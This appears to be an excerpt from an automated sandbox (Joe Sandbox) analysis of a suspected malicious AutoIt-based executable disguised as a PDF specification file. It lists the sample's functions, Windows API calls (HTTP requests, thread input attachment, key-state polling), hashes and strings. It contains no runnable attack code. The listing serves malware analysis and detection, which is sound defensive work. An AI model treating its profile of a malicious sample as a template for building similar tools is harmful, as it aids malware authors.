                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ItemMenu$Info$CheckCountRadioSleep
                                      • String ID:
                                      • API String ID: 1460738036-0
                                      • Opcode ID: d378823e3cd1fed421390da5fe89ac28e2314a10667eaa8edc53291cced07b77
                                      • Instruction ID: f8eae1773cd51c497c208419a24b1ed9b175cb637c05b9dc00d02118686e2b56
                                      • Opcode Fuzzy Hash: d378823e3cd1fed421390da5fe89ac28e2314a10667eaa8edc53291cced07b77
                                      • Instruction Fuzzy Hash: C9619D7190038AAFDB22EFA4D988EAEBBB8FB05308F15009DF541E7651D770AD05CB20
                                      Function 003A9C16 Relevance: 15.2, APIs: 10, Instructions: 183windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 003A9C98
                                      • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 003A9C9B
                                      • GetWindowLongW.USER32(?,000000F0), ref: 003A9CBF
                                      • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003A9CE2
                                      • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 003A9D5A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow
                                      • String ID:
                                      • API String ID: 312131281-0
                                      • Opcode ID: 6fc7789e24b335bb0ff05f42007bafb5ade07a99e396b6ea2fe2016861b3e1a2
                                      • Instruction ID: 88c2a53fa2e5f4faf5a68c25983d6423f0ced4d6b8da4108986382003952bad3
                                      • Opcode Fuzzy Hash: 6fc7789e24b335bb0ff05f42007bafb5ade07a99e396b6ea2fe2016861b3e1a2
                                      • Instruction Fuzzy Hash: 05616C75900208AFDB12DFA8CC81FEEB7B8EB09714F14456AFA05EB2A1D774A941DB50
                                      Function 00384025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00384047
                                      • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003830A5,?,00000001), ref: 0038405B
                                      • GetWindowThreadProcessId.USER32(00000000), ref: 00384062
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003830A5,?,00000001), ref: 00384071
                                      • GetWindowThreadProcessId.USER32(?,00000000), ref: 00384083
                                      • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003830A5,?,00000001), ref: 0038409C
                                      • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003830A5,?,00000001), ref: 003840AE
                                      • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003830A5,?,00000001), ref: 003840F3
                                      • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003830A5,?,00000001), ref: 00384108
                                      • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003830A5,?,00000001), ref: 00384113
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                      • String ID:
                                      • API String ID: 2156557900-0
                                      • Opcode ID: 55ba53e8652202f4311a016b9bd6a696f0f45982ce04e60e82582be4323cc074
                                      • Instruction ID: db01b4cbfa3a43262fd29ff21cd2141572917160d64b7822c268ebee9e00bbaa
                                      • Opcode Fuzzy Hash: 55ba53e8652202f4311a016b9bd6a696f0f45982ce04e60e82582be4323cc074
                                      • Instruction Fuzzy Hash: 4631E6B2500305AFEB12EF54DC49F6ABBADFB50312F118065F905E6690DBB4ED80CB64
                                      Function 003BDD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSysColor.USER32(00000008), ref: 0035B496
                                      • SetTextColor.GDI32(?,000000FF), ref: 0035B4A0
                                      • SetBkMode.GDI32(?,00000001), ref: 0035B4B5
                                      • GetStockObject.GDI32(00000005), ref: 0035B4BD
                                      • GetClientRect.USER32(?), ref: 003BDD63
                                      • SendMessageW.USER32(?,00001328,00000000,?), ref: 003BDD7A
                                      • GetWindowDC.USER32(?), ref: 003BDD86
                                      • GetPixel.GDI32(00000000,?,?), ref: 003BDD95
                                      • ReleaseDC.USER32(?,00000000), ref: 003BDDA7
                                      • GetSysColor.USER32(00000005), ref: 003BDDC5
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                      • String ID:
                                      • API String ID: 3430376129-0
                                      • Opcode ID: ffbe3b9062de37feb495efaccbc2a033b0e96e0d1d36104ffc5e1588c2146709
                                      • Instruction ID: 6fa54f7b4e912c8fa803427e14a95e88dca12ff8aaf369e4aa1e032f4fbc0a09
                                      • Opcode Fuzzy Hash: ffbe3b9062de37feb495efaccbc2a033b0e96e0d1d36104ffc5e1588c2146709
                                      • Instruction Fuzzy Hash: 23118E71100205EFDB626FA4EC08FE97B69EB05326F158235FA66E50F1CB321951DF20
                                      Function 0039BB08 Relevance: 14.3, APIs: 4, Strings: 4, Instructions: 264COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Variant$ClearInit
                                      • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop$h??$|??
                                      • API String ID: 2610073882-3562383994
                                      • Opcode ID: 5691d1264f7367f4ebba05b485ccdf658c8dcb369612ad6c68d231cfa4f1f51e
                                      • Instruction ID: 41de248af1e503785b68e5ab88853378e9c1b47e5dcc4dad4cefc8bc0b083814
                                      • Opcode Fuzzy Hash: 5691d1264f7367f4ebba05b485ccdf658c8dcb369612ad6c68d231cfa4f1f51e
                                      • Instruction Fuzzy Hash: F591AF71A00219EBDF26DFA5ED44FAEBBB8EF45710F10815AF505AB280DB709944CFA0
                                      Function 003905F8 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 230COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 003907AE
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 003907C2
                                      • GetFileAttributesW.KERNEL32(?), ref: 003907DA
                                      • SetFileAttributesW.KERNEL32(?,00000000), ref: 003907F4
                                      • SetCurrentDirectoryW.KERNEL32(?), ref: 00390806
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: CurrentDirectory$AttributesFile
                                      • String ID: *.*
                                      • API String ID: 769691225-438819550
                                      • Opcode ID: e1dfc8075b57e00cb3e221200094a958411294bf73db95857632263fa1fc0a67
                                      • Instruction ID: 2fb303f2eafcf9d8cc0782d8271bdd9b6a428813674dab2c7848619cf5a032eb
                                      • Opcode Fuzzy Hash: e1dfc8075b57e00cb3e221200094a958411294bf73db95857632263fa1fc0a67
                                      • Instruction Fuzzy Hash: C5819F726043019FCF2ADF64C84596EB7E8EF89304F15882EF989DB251E730E9558B92
                                      Function 00343093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                      Download Yara Rule
                                      APIs
                                      • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003430DC
                                      • CoUninitialize.OLE32(?,00000000), ref: 00343181
                                      • UnregisterHotKey.USER32(?), ref: 003432A9
                                      • DestroyWindow.USER32(?), ref: 003B5079
                                      • FreeLibrary.KERNEL32(?), ref: 003B50F8
                                      • VirtualFree.KERNEL32(?,00000000,00008000), ref: 003B5125
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                      • String ID: close all
                                      • API String ID: 469580280-3243417748
                                      • Opcode ID: e3c48d66274914ca937816d3e83ed69ef3800b6f0459f303439257b742de51cc
                                      • Instruction ID: 1770f9e8fbca5b61976457569a04652671d2eb9435f904f9d909cdb225ad8107
                                      • Opcode Fuzzy Hash: e3c48d66274914ca937816d3e83ed69ef3800b6f0459f303439257b742de51cc
                                      • Instruction Fuzzy Hash: D09107346002028FC756EF14C895BA8F3E8FF15304F5542A9E50AAF662DB30BE5ACF50
                                      Function 0035CB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • SetWindowLongW.USER32(?,000000EB), ref: 0035CC15
                                        • Part of subcall function 0035CCCD: GetClientRect.USER32(?,?), ref: 0035CCF6
                                        • Part of subcall function 0035CCCD: GetWindowRect.USER32(?,?), ref: 0035CD37
                                        • Part of subcall function 0035CCCD: ScreenToClient.USER32(?,?), ref: 0035CD5F
                                      • GetDC.USER32 ref: 003BD137
                                      • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 003BD14A
                                      • SelectObject.GDI32(00000000,00000000), ref: 003BD158
                                      • SelectObject.GDI32(00000000,00000000), ref: 003BD16D
                                      • ReleaseDC.USER32(?,00000000), ref: 003BD175
                                      • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 003BD200
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                      • String ID: U
                                      • API String ID: 4009187628-3372436214
                                      • Opcode ID: f9598d87028423da0e6acb435de51879e6cc525fb90731e4ab9b331d7d4d966f
                                      • Instruction ID: 439b84be8e144a210346ca432ea98141747a25fdfb96bac855b5916dd4fb1913
                                      • Opcode Fuzzy Hash: f9598d87028423da0e6acb435de51879e6cc525fb90731e4ab9b331d7d4d966f
                                      • Instruction Fuzzy Hash: 6C71F230400204DFCF239F68CC81EEA7BB9FF48319F194669EE555AAA6E7318845DF60
                                      Function 0038CC5C Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 155COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF), ref: 0038CCA3
                                      • LoadStringW.USER32(?,?,00000FFF,?), ref: 0038CCC5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: LoadString
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2948472770-2391861430
                                      • Opcode ID: 651301d5c199e347d3d8a5daf0e4bc9c1091f49761d9a1612aec7794007d0ec2
                                      • Instruction ID: c72edb8c7b987e31140ad957e8533c99dec361aa45a7b5a688b16ef13ad2dfeb
                                      • Opcode Fuzzy Hash: 651301d5c199e347d3d8a5daf0e4bc9c1091f49761d9a1612aec7794007d0ec2
                                      • Instruction Fuzzy Hash: 91515C72800209BBCF16FBA0CD46EEEB7B8AF04344F1041A5F5057A1A2EB716F59DB61
                                      Function 0038CA48 Relevance: 14.2, APIs: 3, Strings: 5, Instructions: 151COMMON
                                      Download Yara Rule
                                      APIs
                                      • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 0038CA8F
                                      • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 0038CAB0
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: LoadString
                                      • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                      • API String ID: 2948472770-3420473620
                                      • Opcode ID: b435ab121bf195c83dfea01c53dbe362f708f815407d7f4333e63afa45e46d5e
                                      • Instruction ID: e30765386f17c2796baeaa699d2f41ba88f2b2c5dd2e6766fbd526f3e7145e1e
                                      • Opcode Fuzzy Hash: b435ab121bf195c83dfea01c53dbe362f708f815407d7f4333e63afa45e46d5e
                                      • Instruction Fuzzy Hash: F8514B72900609AACF17FBA0DE46EEEB7B8AF04340F104065F5057A0A2EB756F59DB61
                                      Function 003AECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                      Download Yara Rule
                                      APIs
                                        • Part of subcall function 0035B34E: GetWindowLongW.USER32(?,000000EB), ref: 0035B35F
                                        • Part of subcall function 0035B63C: GetCursorPos.USER32(000000FF), ref: 0035B64F
                                        • Part of subcall function 0035B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0035B66C
                                        • Part of subcall function 0035B63C: GetAsyncKeyState.USER32(00000001), ref: 0035B691
                                        • Part of subcall function 0035B63C: GetAsyncKeyState.USER32(00000002), ref: 0035B69F
                                      • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 003AED3C
                                      • ImageList_EndDrag.COMCTL32 ref: 003AED42
                                      • ReleaseCapture.USER32 ref: 003AED48
                                      • SetWindowTextW.USER32(?,00000000), ref: 003AEDF0
                                      • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 003AEE03
                                      • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 003AEEDC
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                      • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                      • API String ID: 1924731296-2107944366
                                      • Opcode ID: 5846c5c807af9e96a0e089881872c063dc65865d3c93951f9593a60051f0c203
                                      • Instruction ID: 4e42cbc804102945c49fe17e2a8671d6f4c515f8d064180b4499a2900cb95387
                                      • Opcode Fuzzy Hash: 5846c5c807af9e96a0e089881872c063dc65865d3c93951f9593a60051f0c203
                                      • Instruction Fuzzy Hash: FC51AC70104300AFD716DF24DC9AF6A77E8FB89304F40492DF9959B2E2DB71A908CB52
                                      Function 003945C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                      Download Yara Rule
                                      APIs
                                      • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003945FF
                                      • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0039462B
                                      • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0039466D
                                      • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00394682
                                      • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0039468F
                                      • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 003946BF
                                      • InternetCloseHandle.WININET(00000000), ref: 00394706
                                        • Part of subcall function 00395052: GetLastError.KERNEL32(?,?,003943CC,00000000,00000000,00000001), ref: 00395067
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                      • String ID:
                                      • API String ID: 1241431887-3916222277
                                      • Opcode ID: 76736d23d3992c57f51f470a28c6b6b452ebd0fdfdc70b89d3996256cd64780d
                                      • Instruction ID: b2015546ecf6c0e686d9fbc0f453cb014056d38ff7fa44d8f321e676917c3f53
                                      • Opcode Fuzzy Hash: 76736d23d3992c57f51f470a28c6b6b452ebd0fdfdc70b89d3996256cd64780d
                                      • Instruction Fuzzy Hash: 5D417CB1501209BFEF139F94CC89FBB77ACFF09304F01412AFA059A191D7B099468BA4
                                      Function 003825B5 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 74windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,003B36F4,00000010,?,Bad directive syntax error,003DDC00,00000000,?,?,?,>>>AUTOIT SCRIPT<<<), ref: 003825D6
                                      • LoadStringW.USER32(00000000,?,003B36F4,00000010), ref: 003825DD
                                      • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 003826A1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: HandleLoadMessageModuleString
                                      • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                      • API String ID: 2734547477-4153970271
                                      • Opcode ID: 5eaccab4b8754f95ba6b902d5a8c004050b8794168ce6abb1dfa0444cf615a38
                                      • Instruction ID: 5c2710c9e5ffe6eabf9a4907ef39ea0c1bbd638b4ac4d755c447890d46fb2b0d
                                      • Opcode Fuzzy Hash: 5eaccab4b8754f95ba6b902d5a8c004050b8794168ce6abb1dfa0444cf615a38
                                      • Instruction Fuzzy Hash: 76212E3191021EBFCF13BB90CC4AEEE7779BF18304F044455F5056A0A2EB75A659DB50
                                      Function 0037BAD7 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 71windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetParent.USER32 ref: 0037BAE3
                                      • GetClassNameW.USER32(00000000,?,00000100), ref: 0037BAF8
                                      • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 0037BB85
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: ClassMessageNameParentSend
                                      • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                      • API String ID: 1290815626-3381328864
                                      • Opcode ID: 55bc6d0753a2cbe1817302a8bedbc83a7067ad8bc3ffb5aa183f06d8573eff55
                                      • Instruction ID: 6b9083ba7449aa78859dc530dffbd81aa14e1b75806c8e9011a97dec092bda71
                                      • Opcode Fuzzy Hash: 55bc6d0753a2cbe1817302a8bedbc83a7067ad8bc3ffb5aa183f06d8573eff55
                                      • Instruction Fuzzy Hash: C1110676648307FAFA376624DC07EB7B7AC9B11724F208026FE08E90D9EFA5A8118514
                                      Function 0039B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameW.KERNEL32(?,?,00000104,?,003DDC00), ref: 0039B715
                                      • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,003DDC00), ref: 0039B749
                                      • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0039B8C1
                                      • SysFreeString.OLEAUT32(?), ref: 0039B8EB
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.6128162862.0000000000341000.00000020.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                      • Associated: 00000000.00000002.6128115490.0000000000340000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003CD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128337550.00000000003EE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128458435.00000000003FA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                      • Associated: 00000000.00000002.6128512606.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_340000_HENG HUI 68 FULL SPECIFICATION DETAILS AND PIC PDF.jbxd
                                      Similarity
                                      • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                      • String ID:
                                      • API String ID: 560350794-0
                                      • Opcode ID: 664b9b0ecf5dafea2a0cd5667fb67b6f504f49d147a45a5ff9fccc18ba93938a
                                      • Instruction ID: 6dfc2a357b420e851dcad5a2284225e0160aae90defd622f90fbdf92721c24d2
